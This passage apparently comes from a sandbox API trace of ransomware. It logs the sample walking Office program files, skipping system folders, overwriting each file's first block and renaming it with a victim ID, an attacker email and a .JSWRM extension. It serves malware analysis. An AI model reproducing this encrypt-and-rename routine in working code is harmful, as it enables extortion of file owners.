lpMultiByteStr="Project.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 35 [0113.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0113.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0113.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0113.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0113.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Project.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\project.x-none.msi.16_mondoww.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.408] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=829080) returned 1 [0113.408] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.408] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.409] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.422] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.422] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.422] CloseHandle (hObject=0x238) returned 1 [0113.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0113.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0113.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0113.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0113.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0113.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0113.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0113.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0113.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0113.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0113.423] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Project.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\project.x-none.msi.16_mondoww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Project.x-none.msi.16_mondoww.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\project.x-none.msi.16_mondoww.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0113.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0113.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0113.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.424] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x128a0e2b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x128a0e2b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x128ed2a1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x268ee4, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Publisher.x-none.msi.16_mondoww.mcxml", cAlternateFileName="PUBLIS~1.MCX")) returned 1 [0113.424] lstrcmpiW (lpString1="Publisher.x-none.msi.16_mondoww.mcxml", lpString2=".") returned 1 [0113.424] lstrcmpiW (lpString1="Publisher.x-none.msi.16_mondoww.mcxml", lpString2="..") returned 1 [0113.424] lstrcmpiW (lpString1="Publisher.x-none.msi.16_mondoww.mcxml", lpString2="...") returned 1 [0113.424] lstrcmpiW (lpString1="Publisher.x-none.msi.16_mondoww.mcxml", lpString2="windows") returned -1 [0113.424] lstrcmpiW (lpString1="Publisher.x-none.msi.16_mondoww.mcxml", lpString2="recovery") returned -1 [0113.424] lstrcmpiW (lpString1="Publisher.x-none.msi.16_mondoww.mcxml", lpString2="perflogs") returned 1 [0113.424] lstrcmpiW (lpString1="Publisher.x-none.msi.16_mondoww.mcxml", lpString2="documents and settings") returned 1 [0113.424] lstrcmpiW (lpString1="Publisher.x-none.msi.16_mondoww.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.424] lstrcmpiW (lpString1="Publisher.x-none.msi.16_mondoww.mcxml", lpString2="system volume information") returned -1 [0113.424] lstrcmpiW (lpString1="Publisher.x-none.msi.16_mondoww.mcxml", lpString2="msocache") returned 1 [0113.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0113.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Publisher.x-none.msi.16_mondoww.mcxml", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0113.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Publisher.x-none.msi.16_mondoww.mcxml", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Publisher.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 37 [0113.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0113.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0113.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Publisher.x-none.msi.16_mondoww.mcxml", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0113.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Publisher.x-none.msi.16_mondoww.mcxml", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Publisher.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 37 [0113.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0113.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0113.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0113.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.425] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0113.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Publisher.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\publisher.x-none.msi.16_mondoww.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.425] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2526948) returned 1 [0113.425] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.425] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.439] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.439] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.440] CloseHandle (hObject=0x238) returned 1 [0113.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0113.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0113.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0113.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0113.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0113.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0113.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0113.440] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0113.440] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0113.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0113.441] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Publisher.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\publisher.x-none.msi.16_mondoww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Publisher.x-none.msi.16_mondoww.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\publisher.x-none.msi.16_mondoww.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0113.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0113.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0113.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.442] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4c5b962, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4c5b962, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4c81c51, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x148572, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Visio.x-none.msi.16_mondoww.mcxml", cAlternateFileName="VISIOX~1.MCX")) returned 1 [0113.442] lstrcmpiW (lpString1="Visio.x-none.msi.16_mondoww.mcxml", lpString2=".") returned 1 [0113.442] lstrcmpiW (lpString1="Visio.x-none.msi.16_mondoww.mcxml", lpString2="..") returned 1 [0113.442] lstrcmpiW (lpString1="Visio.x-none.msi.16_mondoww.mcxml", lpString2="...") returned 1 [0113.442] lstrcmpiW (lpString1="Visio.x-none.msi.16_mondoww.mcxml", lpString2="windows") returned -1 [0113.442] lstrcmpiW (lpString1="Visio.x-none.msi.16_mondoww.mcxml", lpString2="recovery") returned 1 [0113.442] lstrcmpiW (lpString1="Visio.x-none.msi.16_mondoww.mcxml", lpString2="perflogs") returned 1 [0113.442] lstrcmpiW (lpString1="Visio.x-none.msi.16_mondoww.mcxml", lpString2="documents and settings") returned 1 [0113.442] lstrcmpiW (lpString1="Visio.x-none.msi.16_mondoww.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.442] lstrcmpiW (lpString1="Visio.x-none.msi.16_mondoww.mcxml", lpString2="system volume information") returned 1 [0113.442] lstrcmpiW (lpString1="Visio.x-none.msi.16_mondoww.mcxml", lpString2="msocache") returned 1 [0113.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0113.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Visio.x-none.msi.16_mondoww.mcxml", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0113.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Visio.x-none.msi.16_mondoww.mcxml", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Visio.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 33 [0113.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0113.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0113.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Visio.x-none.msi.16_mondoww.mcxml", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0113.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Visio.x-none.msi.16_mondoww.mcxml", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Visio.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 33 [0113.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0113.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0113.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0113.442] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.443] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0113.443] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Visio.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\visio.x-none.msi.16_mondoww.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.444] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1344882) returned 1 [0113.444] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.444] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.489] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.489] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.489] CloseHandle (hObject=0x238) returned 1 [0113.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0113.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0113.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0113.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0113.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0113.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0113.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0113.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0113.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0113.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0113.490] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Visio.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\visio.x-none.msi.16_mondoww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Visio.x-none.msi.16_mondoww.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\visio.x-none.msi.16_mondoww.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0113.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0113.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0113.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.492] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4c81c51, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4c81c51, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4c81c51, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x13a, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Visio.x-none.msi.16_PostCommon.Visio.x-none.mcxml", cAlternateFileName="VISIOX~2.MCX")) returned 1 [0113.492] lstrcmpiW (lpString1="Visio.x-none.msi.16_PostCommon.Visio.x-none.mcxml", lpString2=".") returned 1 [0113.492] lstrcmpiW (lpString1="Visio.x-none.msi.16_PostCommon.Visio.x-none.mcxml", lpString2="..") returned 1 [0113.492] lstrcmpiW (lpString1="Visio.x-none.msi.16_PostCommon.Visio.x-none.mcxml", lpString2="...") returned 1 [0113.492] lstrcmpiW (lpString1="Visio.x-none.msi.16_PostCommon.Visio.x-none.mcxml", lpString2="windows") returned -1 [0113.492] lstrcmpiW (lpString1="Visio.x-none.msi.16_PostCommon.Visio.x-none.mcxml", lpString2="recovery") returned 1 [0113.492] lstrcmpiW (lpString1="Visio.x-none.msi.16_PostCommon.Visio.x-none.mcxml", lpString2="perflogs") returned 1 [0113.492] lstrcmpiW (lpString1="Visio.x-none.msi.16_PostCommon.Visio.x-none.mcxml", lpString2="documents and settings") returned 1 [0113.492] lstrcmpiW (lpString1="Visio.x-none.msi.16_PostCommon.Visio.x-none.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.492] lstrcmpiW (lpString1="Visio.x-none.msi.16_PostCommon.Visio.x-none.mcxml", lpString2="system volume information") returned 1 [0113.492] lstrcmpiW (lpString1="Visio.x-none.msi.16_PostCommon.Visio.x-none.mcxml", lpString2="msocache") returned 1 [0113.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0113.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Visio.x-none.msi.16_PostCommon.Visio.x-none.mcxml", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0113.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0113.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Visio.x-none.msi.16_PostCommon.Visio.x-none.mcxml", cchWideChar=49, lpMultiByteStr=0x20dba8, 